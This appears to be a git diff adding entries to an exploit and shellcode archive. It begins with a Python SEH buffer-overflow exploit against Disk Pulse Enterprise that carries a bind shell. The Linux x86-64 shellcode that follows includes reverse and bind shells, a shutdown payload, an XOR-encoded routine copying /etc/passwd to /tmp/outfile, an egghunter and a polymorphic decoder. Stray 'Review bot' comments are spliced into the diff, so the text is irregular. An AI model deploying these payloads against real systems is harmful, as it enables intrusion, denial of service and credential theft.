"\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d" +buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92" +buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2" +buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a" +buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f" +buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28" +buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27" +buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e" +buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f" +buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87" +buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9" +buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee" +buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e" +buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9" +buf += 
"\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4" +buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e" +buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e" +buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23" +buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26" +buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44" +buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc" +buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62" +buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f" +buf += "\x7d\x58\x6e\x5a" + +shellcode = buf + +payload = 'A' * 124             #offset +payload +=  '\xeb\x12\x90\x90'  #jmp over seh retrun value +payload += '\x3b\x38\x01\x10' * 4   # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll] +payload += stage1 +payload +=  '\x90' * (1000 - len(payload) - len(shellcode)) +payload += shellcode + + + +header = '\x75\x19\xba\xab' +header += '\x03\x00\x00\x00' +header += '\x00\x40\x00\x00' +header += pack(' add esp,127 +stage1 += "\x83\xc4\x04"    # metasm > add esp,4 +stage1 +=  "\xff\xe4"       # metasm > jmp esp +# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02' + +buf =  "\x90" * 10 +buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31" +buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f" +buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b" +buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a" +buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d" +buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92" +buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2" +buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a" +buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f" +buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28" +buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27" +buf += 
"\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e" +buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f" +buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87" +buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9" +buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee" +buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e" +buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9" +buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4" +buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e" +buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e" +buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23" +buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26" +buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44" +buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc" +buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62" +buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f" +buf += "\x7d\x58\x6e\x5a" + +shellcode = buf +payload = 'A' * 124             #offset +payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value +payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll) +payload += stage1 +payload +=  '\x90' * (1000 - len(payload) - len(shellcode)) +payload += shellcode + + + +header = '\x75\x19\xba\xab' +header += '\x03\x00\x00\x00' +header += '\x00\x40\x00\x00' +header += pack(' +#include +#include + +unsigned char egg[] = +"YOUR EGG HERE 4 bytes"; + +// In this example we use a password protected binshell on port 1337: pAzzW0rd +unsigned char bindshell[] = 
+"\xeb\x09\x48\x31\xff\x48\xf7\xe7\x57\x5e\xc3\x55\x48\x89\xe5\xe8\xee\xff\xff\xff\x04\x29\x40\x80\xc7\x02\xff\xc6\x0f\x05\x50\xe8\xde\xff\xff\xff\x04\x31\x48\x8b\x3c\x24\x56\x81\xc6\x03\x01\x05\x39\x66\x81\xee\x01\x01\x56\x48\x89\xe6\x80\xc2\x10\x0f\x05\xe8\xbe\xff\xff\xff\x04\x32\x48\x8b\x7d\xf8\x0f\x05\xe8\xb1\xff\xff\xff\x04\x2b\x48\x8b\x7d\xf8\x48\x89\xe6\x80\xc2\x18\x52\x48\x89\xe2\x0f\x05\x49\x89\xc0\xe8\x97\xff\xff\xff\x4c\x89\xc7\x40\x80\xec\x18\x48\x89\xe6\x80\xc2\x18\x0f\x05\x48\xb8\x70\x41\x7a\x7a\x57\x30\x72\x64\x48\x89\xe7\x48\xaf\x75\x42\x48\x31\xc0\x4c\x89\xc7\x48\x31\xf6\x40\x80\xc6\x02\x04\x21\x0f\x05\x48\x31\xc0\x04\x21\x48\xff\xce\x75\xf4\x0f\x05\xe8\x55\xff\xff\xff\x50\x04\x3b\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x50\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x48\x89\xec\x5d\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05"; + +unsigned char egghunter[] = +"\x48\x31\xf6\x56\x5a\x6a\x08\x5b\x66\x81\xca\xff\x0f\x48\xff\xc2\x6a\x15\x58\x52\x5f\x48\x01\xdf\x0f\x05\x3c\xf2\x74\xea\xb8\xbd\xbe\xbd\xbe\xf7\xd0\x48\x89\xd7\xaf\x75\xe2\x3b\x07\x75\xde\xff\xe7"; + + + +main() +{ + + char *heap = (char*)malloc(1000000); + memset(heap, '\0', 512); + strncpy(heap, egg, 4); + strncpy(heap+4, egg, 4); + strncpy(heap+8, bindshell, 212); + + printf("Egghunter Length: %d\n", strlen(egghunter)); + printf("Shellcode Length: %d\n", strlen(bindshell)); + int (*ret)() = (int(*)())egghunter; + ret(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43555.c b/shellcodes/linux_x86-64/43555.c new file mode 100644 index 000000000..7e6cb4c48 --- /dev/null +++ b/shellcodes/linux_x86-64/43555.c 
@@ -0,0 +1,64 @@
+/*
+; Title: shutdown -h now x86_64 Shellcode - 65 bytes
+; Platform: linux/x86_64
+; Date: 2014-06-27
+; Author: Osanda Malith Jayathissa (@OsandaMalith)
+
+section .text
+
+global _start
+
+_start:
+
+xor rax, rax
+xor rdx, rdx
+
+push rax
+push byte 0x77
+push word 0x6f6e ; now
+mov rbx, rsp
+
+push rax
+push word 0x682d ;-h
+mov rcx, rsp
+
+push rax
+mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
+mov r10, 0x6e776f6474756873
+push r10
+push r8
+mov rdi, rsp
+
+push rdx
+push rbx
+push rcx
+push rdi
+mov rsi, rsp
+
+add rax, 59
+syscall
+
+*/
+
+#include
+#include
+
+unsigned char code[] = "\x48\x31\xc0\x48\x31\xd2\x50\x6a"
+"\x77\x66\x68\x6e\x6f\x48\x89\xe3"
+"\x50\x66\x68\x2d\x68\x48\x89\xe1"
+"\x50\x49\xb8\x2f\x73\x62\x69\x6e"
+"\x2f\x2f\x2f\x49\xba\x73\x68\x75"
+"\x74\x64\x6f\x77\x6e\x41\x52\x41"
+"\x50\x48\x89\xe7\x52\x53\x51\x57"
+"\x48\x89\xe6\x48\x83\xc0\x3b\x0f"
+"\x05";
+
+int
+main() {
+
+printf("Shellcode Length: %d\n", (int)strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43556.asm b/shellcodes/linux_x86-64/43556.asm
new file mode 100644
index 000000000..c01f58f97
--- /dev/null
+++ b/shellcodes/linux_x86-64/43556.asm
@@ -0,0 +1,72 @@
+; ===================================================================
+; Optimized version of shellcode at:
+; http://shell-storm.org/shellcode/files/shellcode-877.php
+; Author: SLAE64-1351 (Keyman)
+; Date: 14/09/2014
+;
+; Length: 64 bytes (got shorter by 1 byte :D )
+;
+; What's new is that some optimalization was performed on the
+; original code which left some space to do a basic decoding of the
+; command (/sbin/shutdown). Each byte (except the first one) was
+; decremented by 1. The decoder just adds 1 to each byte.
+;
+; ===================================================================
+
+section .text
+global _start
+
+_start:
+
+xor rax, rax ; clear rax and rdx
+cdq
+
+; -------------------------------------------------------------------
+; 1. store '-h' on stack
+; -------------------------------------------------------------------
+
+push rax
+push word 0x682d ;-h
+push rsp
+pop rcx
+
+; -------------------------------------------------------------------
+; 2. store 'now' on stack
+; -------------------------------------------------------------------
+
+push rax
+push byte 0x77
+push word 0x6f6e ; now
+push rsp
+pop rbx
+
+push rax
+push rbx
+push rcx
+
+; -------------------------------------------------------------------
+; 3. store '/sbin/shutdown' on stack
+; -------------------------------------------------------------------
+
+push rsp
+pop rsi
+
+push rax
+jmp shutdown
+cont:
+pop rdi
+
+push 15
+pop rcx
+
+do_add:
+ add byte [rdi+rcx], 0x01
+ loop do_add
+
+push 59
+pop rax
+syscall
+
+shutdown:
+ call cont
+ c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43557.asm b/shellcodes/linux_x86-64/43557.asm
new file mode 100644
index 000000000..0ab2c5d72
--- /dev/null
+++ b/shellcodes/linux_x86-64/43557.asm
@@ -0,0 +1,89 @@
+; ===================================================================
+; Optimized version of shellcode at:
+; http://shell-storm.org/shellcode/files/shellcode-867.php
+; Author: SLAE64-1351 (Keyman)
+; Date: 14/09/2014
+;
+; Length: 105 bytes (got shorter by 13 bytes)
+;
+; What's new is that some optimalization was performed on the
+; original code which left some space to do a basic decoding of the
+; file names. Each byte (except the first one) was xor'ed with the
+; value 0x32. The decoder part xor's each byte (except the first)
+; with this very same value.
+;
+; ===================================================================
+
+section .text
+global _start
+
+_start:
+ xor rsi, rsi
+ jmp string_1
+cont_1:
+ pop rdi
+
+ ; decode
+
+ push 24
+ pop rcx
+decode:
+ xor byte [rdi+rcx], 0x32
+ loop decode
+
+ sub byte [rdi+11], 0x41 ; set last byte to 0x00
+ sub byte [rdi+24], 0x41 ; set last byte to 0x00
+
+ ; open (1)
+
+ push 2
+ pop rax
+ syscall
+
+ push rax
+ pop r14 ; source
+
+ ; open (2)
+
+ add rdi, 12
+ push 0x66
+ pop rsi
+ push 2
+ pop rax
+ syscall
+
+ push rax
+ pop r15 ; destination
+
+ ; read
+
+ xor rax, rax
+ push r14
+ pop rdi
+ push rsp
+ pop rsi
+ mov dx, 0xFFFF
+ syscall
+
+ ; write
+
+ push rax
+ pop rdx
+
+ push r15
+ pop rdi
+
+ push 1
+ pop rax
+ syscall
+
+ ; exit
+
+ push 60
+ pop rax
+ syscall
+
+string_1:
+ call cont_1
+ ; first byte stays the original value
+ s_1: db 0x2F, 0x57, 0x46, 0x51, 0x1D, 0x42, 0x53, 0x41, 0x41, 0x45, 0x56, 0x73, 0x1D, 0x46, 0x5F, 0x42, 0x1D, 0x5D, 0x47, 0x46, 0x54, 0x5B, 0x5E, 0x57, 0x73
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43558.asm b/shellcodes/linux_x86-64/43558.asm
new file mode 100644
index 000000000..0448a6a13
--- /dev/null
+++ b/shellcodes/linux_x86-64/43558.asm
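Review bot: The header says the sample does "a basic decoding of the file names" but never names them, so a reader has to decode s_1 by hand to learn what the shellcode touches; applying the documented xor 0x32 to the s_1 bytes (with the two 0x41 terminators turned into NUL by the sub instructions) yields `/etc/passwd` as the first string and `/tmp/outfile` as the second, and the open(2) flags 0x66 create/truncate the latter. That is exactly the information a reviewer or detection engineer needs up front. Suggest adding to the header comment `; Behaviour: reads /etc/passwd (open flags 0) and writes its contents to /tmp/outfile (open flags 0x66 = O_RDWR|O_CREAT|O_TRUNC); both names are xor-0x32 encoded in s_1`. The "source"/"destination" comments on r14/r15 could then reference those names as well.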
@@ -0,0 +1,176 @@ +; =================================================================== +; Password Protected Reverse Shell +; Author: SLAE64-1351 (Keyman) +; Date: 04/09/2014 +; +; Shellcode length: 136 bytes +; +; Description: +; +; Simple reverse shell (listens on port 4444 by default) with +; bytes password protection. Using a 4 bytes long password is +; still reasonably strong for a single-shot connection and keeps +; the code shorter. +; +; To change the port or the password just modify the values of the +; exp_port and exp_pass "variables" below. +; +; Before the code gets executed make sure to create a listener: +; +; nc -lvp +; +; After you receive the connection you will see no password +; prompt. Just type in the 4 bytes long password and hit enter. +; If the password matches, you are ready to type OS commands. +; +; =================================================================== + +global _start +section .text + +; ------------------------------------------------------------------- +; Preprocessor directives so you can easily change the port and the +; password. +; ------------------------------------------------------------------- + +; Host to connect to. Please note that this value will have +; 0x02020202 added to it, this way avoiding the NULL bytes. + +%define exp_host 0xFEFDFE7D ; 127.0.0.1 + +; Port number to listen on. +%define exp_port 0x5c11 ; 4444 + +; Password to use. Make sure it's not longer than 4 bytes. 
+%define exp_pass 0x6c6c6568 ; hell + +; ------------------------------------------------------------------- +; DO NOT TOUCH +; preprocessor directives so syscalls can be easily referenced +; ------------------------------------------------------------------- + +%define sys_connect 42 +%define sys_read 0 +%define sys_execve 59 +%define sys_dup2 33 + +_start: + + ; --------------------------------------------------------------- + ; START: create socket + ; --------------------------------------------------------------- + xor rax, rax + push rax ; saving for sockaddr + push rax ; struct + push rax ; clear rax later + push rax ; set rdx to 0 + pop rdx ; protocol + mov al, 2 + push rax + push rax + pop rsi + pop rdi ; PF_INET + shr rsi, 1 ; SOCK_STREAM + add al, 39 ; socket syscall (41) + syscall + + ; --------------------------------------------------------------- + ; START: create struct + ; + ; srv_addr.sin_family = AF_INET; + ; srv_addr.sin_addr.s_addr = INADDR_ANY; + ; srv_addr.sin_port = htons(portno); + ; + ; This is how it looks like on the stack: + ; 0x02 0x00 0x11 0x5c 0x7f 0x00 0x00 0x01 + ; 0x20 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + ; --------------------------------------------------------------- + + ; TODO: have to make this shorter somehow + mov byte [rsp], 2 ; set values + mov word [rsp+2], exp_port + mov dword [rsp+4], exp_host + add dword [rsp+4], 0x02020202 + push rsp + pop rsi ; addr of struct in rsi + + ; --------------------------------------------------------------- + ; START: connect + ; --------------------------------------------------------------- + + ; rdx is still 0 + push rax ; socket fd + pop rdi + add dl, 16 + mov al, sys_connect + syscall + + ; --------------------------------------------------------------- + ; get passwd + ; + ; We will work with a 4 byte password, should be more than + ; enough as no brute forcing is possible. Chances to guess + ; the right value is 0. Of course passwd should not contain + ; null bytes. 
+ ; + ; n = read(newsockfd,buffer,4); + ; --------------------------------------------------------------- + + push rax ; buffer filled with 0s + push rsp ; setup pointer to buf + pop rsi + sub rdx, 12 ; set bytes to read (4) + syscall + + ; compare pass received with valid pass and exit if no match + + push rax + pop rcx + + push rdi ; save socket + pop rax + + sub rcx, 3 ; read only once + push rsp + pop rdi + push exp_pass + push rsp + pop rsi + cmpsq + jne passfail ; passwd match, give shell + +shell: + ; --------------------------------------------------------------- + ; 6. exec shell + ; --------------------------------------------------------------- + + add cl, 2 ; rcx is 1, so add 2 = 3 + push rax ; restore socket + pop rdi +dup_loop: + push rcx ; have to save rcx as dup2 + ; changes it's value + xor rax, rax + sub rcx, 1 + push rcx + pop rsi + add al, sys_dup2 + syscall + pop rcx ; restore the counter + loop dup_loop + + jmp mytext + +code: + pop rdi + mov [rdi+7], BYTE al + push rax + pop rdx + add al, sys_execve + syscall + +mytext: + call code + MyText: db '/bin/sh', 0x41 + +passfail: \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43559.asm b/shellcodes/linux_x86-64/43559.asm new file mode 100644 index 000000000..0c2bade8f --- /dev/null +++ b/shellcodes/linux_x86-64/43559.asm 
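Review bot: The "get passwd" comment block states that "no brute forcing is possible" and that the chance of guessing the 4-byte password "is 0"; a 4-byte value has at most 2^32 candidates, and what actually bounds guessing here is that the code does a single read and a single cmpsq before branching to passfail, i.e. one attempt per connection, so the comment overstates the protection. Suggest replacing those lines with `; 4-byte password: one read + one compare per connection, so a wrong guess costs a new connection, but the key space is small (2^32) and this is not an unguessable secret`. The identical comment block appears in the "get passwd" section of shellcodes/linux_x86-64/43559.asm and should be corrected there too. The header's note that exp_pass is a placeholder to be changed is accurate and should stay.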
@@ -0,0 +1,214 @@ +; =================================================================== +; Password Protected Bind Shell +; Author: SLAE64-1351 (Keyman) +; Date: 03/09/2014 +; +; Shellcode length: 147 bytes +; +; Description: +; +; Simple bind shell (listens on port 4444 by default) with 4 bytes +; password protection. Using a 4 bytes long password is still +; reasonably strong for a single-shot connection and keeps the +; code shorter. +; +; To change the port or the password just modify the values of the +; exp_port and exp_pass "variables" below. +; +; After the code gets executed connect to the newly opened port: +; +; nc +; +; There is no password prompt. Type in the 4 bytes long password +; and hit enter. If the password matches, you are ready to type +; OS commands. +; +; =================================================================== + +global _start +section .text + +; ------------------------------------------------------------------- +; Preprocessor directives so you can easily change the port and the +; password. +; ------------------------------------------------------------------- + +; Port number to listen on. +%define exp_port 0x5c11 ; 4444 + +; Password to use. 
+%define exp_pass 0x6c6c6568 ; hell + +; ------------------------------------------------------------------- +; DO NOT TOUCH +; preprocessor directives so syscalls can be easily referenced +; ------------------------------------------------------------------- + +%define sys_bind 49 +%define sys_listen 50 +%define sys_accept 43 +%define sys_execve 59 +%define sys_dup2 33 + +_start: + + ; --------------------------------------------------------------- + ; START: create socket + ; --------------------------------------------------------------- + xor rax, rax + push rax ; saving for sockaddr + push rax ; struct + push rax ; clear rax later + push rax ; set rdx to 0 + pop rdx ; protocol + mov al, 2 + push rax + push rax + pop rsi + pop rdi ; PF_INET + shr rsi, 1 ; SOCK_STREAM + add al, 39 ; socket syscall (41) + syscall + + ; --------------------------------------------------------------- + + push rax ; store sockfd as first + pop rdi ; argument of bind + + ; --------------------------------------------------------------- + ; START: create struct + ; + ; srv_addr.sin_family = AF_INET; + ; srv_addr.sin_addr.s_addr = INADDR_ANY; + ; srv_addr.sin_port = htons(portno); + ; + ; This is how it looks like on the stack (port is 4444): + ; + ; 0x02 0x00 0x11 0x5c 0x00 0x00 0x00 0x00 + ; 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + ; --------------------------------------------------------------- + pop rax ; clear rax so can be + ; used for syscall Nr. 
+ mov byte [rsp], 2 ; set values + mov word [rsp+2], exp_port + push rsp + pop rsi ; addr of struct in rsi + + ; --------------------------------------------------------------- + ; bind socket + ; --------------------------------------------------------------- + + push rax + pop rdx + add dl, 16 ; socklen_t addrlen + add al, sys_bind ; syscall number + syscall + + ; --------------------------------------------------------------- + ; listen + ; --------------------------------------------------------------- + + ; rdi should still hold the socket descriptor so we don't + ; have to set it again + + ; We can save a 'xor rax, rax' here. + ; If success, 0 is returned by bind, we will have the rax reg. + ; cleared. + + push 2 + pop rsi + add al, sys_listen + syscall + + ; --------------------------------------------------------------- + ; accept + ; --------------------------------------------------------------- + + ; rdi should still hold the socket descriptor so we don't + ; have to set it again + + ; We can save a 'xor rax, rax' here. + ; If success, 0 is returned by listen, we will have the rax reg. + ; cleared. + + push rax + pop rdx + push rax + pop rsi + add al, sys_accept + syscall + + ; at this point rax contains the new socket descriptor + + push rax ; save new sockfd + push rax ; + pop rdi ; first argument for + ; read() + pop r15 ; save for later + + ; --------------------------------------------------------------- + ; get passwd + ; + ; We will work with a 4 byte password, should be more than + ; enough as no brute forcing is possible. Chances to guess + ; the right value is 0. Of course passwd should not contain + ; null bytes. + ; + ; n = read(newsockfd,buffer,4); + ; --------------------------------------------------------------- + + xor rax, rax ; read() is syscall Nr. 
0 + push rax ; buffer filled with 0s + push rsp ; setup pointer to buf + pop rsi + add rdx, 4 + syscall + + ; compare pass received with valid pass and exit if no match + + xor rcx, rcx + inc rcx + push rsp + pop rdi + push exp_pass + push rsp + pop rsi + cmpsq + jne passfail ; passwd match, give shell + +shell: + ; --------------------------------------------------------------- + ; 6. exec shell + ; --------------------------------------------------------------- + + add cl, 2 + mov rdi, r15 +dup_loop: + push rcx ; have to save rcx as dup2 + ; changes it's value + xor rax, rax + sub rcx, 1 + push rcx + pop rsi + add al, sys_dup2 + syscall + pop rcx ; restore the counter + loop dup_loop + + jmp mytext + +code: + pop rdi + mov [rdi+7], BYTE al + push rax + push rax + pop rsi + pop rdx + add al, sys_execve + syscall + +mytext: + call code + MyText: db '/bin/sh', 0x41 + +passfail: \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43561.asm b/shellcodes/linux_x86-64/43561.asm new file mode 100644 index 000000000..b1e9a2708 --- /dev/null +++ b/shellcodes/linux_x86-64/43561.asm 
@@ -0,0 +1,50 @@ +; =================================================================== +; "Polymorphic" version of shellcode at: +; http://shell-storm.org/shellcode/files/shellcode-658.php +; Author: SLAE64-1351 (Keyman) +; Date: 21/09/2014 +; +; Length: 273 bytes (got shorter by 117 bytes) +; +; The original code was optimized. This way it became 240 bytes long. +; Each byte of the optimized shellcode was XOR'ed with 0xDE. The +; result was dumped as the encoded shellcode below. A decoder stub +; was implemented to XOR each byte of "shellcode" with 0xDE. (except +; the first byte). After the decoding is finished execution is +; passed to the original (decoded) shellcode. +; +; =================================================================== + +section .text +global _start + +_start: + +; ------------------------------------------------------------------- +; Shellcode decoder stub +; ------------------------------------------------------------------- + + push 1 + pop rcx +begin: + cmp rcx, 1 + je begin_sc + pop rdi ; rdi points to the shellcode + push byte 0x78 + pop rcx + add rcx, 0x77 +decode: + xor byte [rdi+rcx], 0xDE + loop decode + jmp shellcode + +begin_sc: + dec rcx + call begin + +; ------------------------------------------------------------------- +; Encoded shellcode +; ------------------------------------------------------------------- + +shellcode: + sc: db 0xEB, 0xBB, 0x81, 0x5E, 0xB1, 0xD5, 0x9F, 0x5E, 0xB1, 0xC6, 0x9F, 0xB4, 0xDC, 0x87, 0xB4, 0xDC, 0x86, 0x8E, 0x8E, 0x80, 0x84, 0xB8, 0x5F, 0x18, 0xD1, 0xDA, 0xB8, 0x5F, 0x1C, 0x5C, 0xDC, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x49, 0x96, 0x5D, 0x19, 0xD3, 0x3C, 0x3D, 0x96, 0x21, 0x11, 0x89, 0x80, 0x8E, 0x81, 0xB4, 0xDC, 0x87, 0xB4, 0xF0, 0x9F, 0x80, 0xB4, 0xDF, 0x86, 0x9F, 0x88, 0x84, 0x8F, 0xD1, 0xDB, 0x87, 0x96, 0x5D, 0x18, 0xEE, 0x97, 0x59, 0x21, 0xB4, 0xE5, 0x9F, 0x80, 0x3C, 0x37, 0xB4, 0xDC, 0x87, 0xB4, 0xDD, 0x86, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x59, 0x21, 0x3C, 0x2A, 0x96, 0xEF, 0x21, 0xB4, 0xE2, 
0x86, 0xD1, 0xDB, 0x36, 0x48, 0x21, 0x21, 0x21, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAE, 0xBF, 0xAD, 0xAD, 0xA9, 0xBA, 0x9F, 0xF1, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAD, 0xB6, 0xBF, 0xBA, 0xB1, 0xA9, 0x9F, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xA6, 0xE4, 0xEE, 0xE4, 0xEE, 0xE4, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xF0, 0xB1, 0xAC, 0xB9, 0xE4, 0xF1, 0xE4, 0xF1, 0xBC, 0xB7, 0xB0, 0xF1, 0xBC, 0xBF, 0xAD, 0xB6, 0xD4, 0xAD, 0xB6, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xFA, 0xEF, 0xFA, 0xAC, 0xBB, 0x89, 0x9B, 0xE9, 0x99, 0x93, 0xEF, 0xFA, 0xBF, 0xA6, 0xBB, 0x93, 0xB9, 0xE8, 0x92, 0x8A, 0xAD, 0xF1, 0x8E, 0xBA, 0x8D, 0xB9, 0xBD, 0x98, 0x84, 0xEE, 0x8B, 0xED, 0x93, 0xF1, 0xE4, 0xEF, 0xEA, 0xE9, 0xE9, 0xE6, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xD4 \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43562.c b/shellcodes/linux_x86-64/43562.c new file mode 100644 index 000000000..357f5ff86 --- /dev/null +++ b/shellcodes/linux_x86-64/43562.c 
@@ -0,0 +1,193 @@ +;Exam Assignment 3 +;implementation of egghunter +;Default egg = "deaddead" ; +;If connected the stager check of egg , if present execute the code ; +;You can send a maximum of 255 bytes (egg + code) ; +;if no egg , shellcode exit ; +;Christophe G SLAE64 - 1337 ; + + + +global _start + + jmp short _start + _start_code : + call rsi + +_start: + + + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; syscall number 41 + + xor rdx , rdx + push rdx ; null into the stack + push byte 0x29 ; syscall number 41 + pop rax + push byte 0x2 ; AF_INET + pop rdi + push byte 0x1 ; SOCK_STREAM + pop rsi + syscall + + ; copy socket descriptor to rdi for future use + xchg rax , rdi + + + ; server.sin_family = AF_INET + ; server.sin_port = htons(PORT) + ; server.sin_addr.s_addr = INADDR_ANY + ; bzero(&server.sin_zero, 8) + + xor rax, rax + + push rax ; bzero(&server.sin_zero, 8) + + + mov rbx , 0xffffffffa3eefffd ; move ip address , port 4444 , AF_INET (02) in one instruction (noted to remove null of ip address and AF_INET value) + + + not rbx + push rbx + push rsp ; save rsp value into the stack , needed for rsi later + + + ; bind(sock, (struct sockaddr *)&server, sockaddr_len) + ; syscall number 49 + + + push byte 0x31 ; (49) + pop rax + pop rsi ; retrieve value of rsp pushed into the stack before + push byte 0x10 ; (16 bytes) sockaddr_len + pop rdx + syscall + + + ; listen(sock, MAX_CLIENTS) + ; syscall number 50 + + push byte 0x32 ; (50) + pop rax + push byte 0x2 ;MAX_CLIENTS + + pop rsi + syscall + + + ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) + ; syscall number 43 + + + push byte 0x2b ; Accept syscall + pop rax + sub rsp, 0x10 + push rsp + pop rsi ;(struct sockaddr *)&client + + push byte 0x10 + push rsp + pop rdx ; &sockaddr_len + + syscall + + ; store the client socket description + mov r9, rax + + ; close parent + + push byte 0x3 + pop rax + syscall + + + + + + xchg rdi , r9 ; restore client socket 
